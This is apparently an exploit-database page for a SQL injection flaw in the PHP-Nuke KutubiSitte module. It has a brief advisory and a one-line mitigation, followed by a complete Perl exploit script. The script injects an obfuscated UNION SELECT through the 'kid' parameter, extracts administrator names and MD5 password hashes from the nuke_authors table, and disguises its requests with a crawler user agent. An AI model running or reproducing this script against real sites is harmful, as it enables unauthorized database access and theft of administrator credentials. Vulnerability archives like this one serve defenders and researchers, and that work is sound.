header-logo
Suggest Exploit
vendor:
KutubiSitte
by:
Lovebug and r080cy90r from RBT-4
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: KutubiSitte
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-NUKE KutubiSitte [kid] SQL Injection

The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28126/info

The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

#!/usr/bin/perl use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("


  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
 #######################################################
 # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
 #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#


");
}
sub problem{
   print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
   exit();
}
sub exploitation{
      $conn = LWP::UserAgent -> new;
   $conn->agent('Checkbot/0.4 ');
   $query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%
2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
   $return_pwd = $conn->get($query_pwd) || problem();
   $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
   print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
  }

getopts(":h:p:U:",\%args);
    $host = $args{h} if (defined $args{h});
    $path = $args{p} if (defined $args{p});
    $user_id= $args{U}if (defined $args{U});
        if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
       usg();
    }
    else{
       exploitation();
    }

Navigation

Suggest Exploit

Services By CQR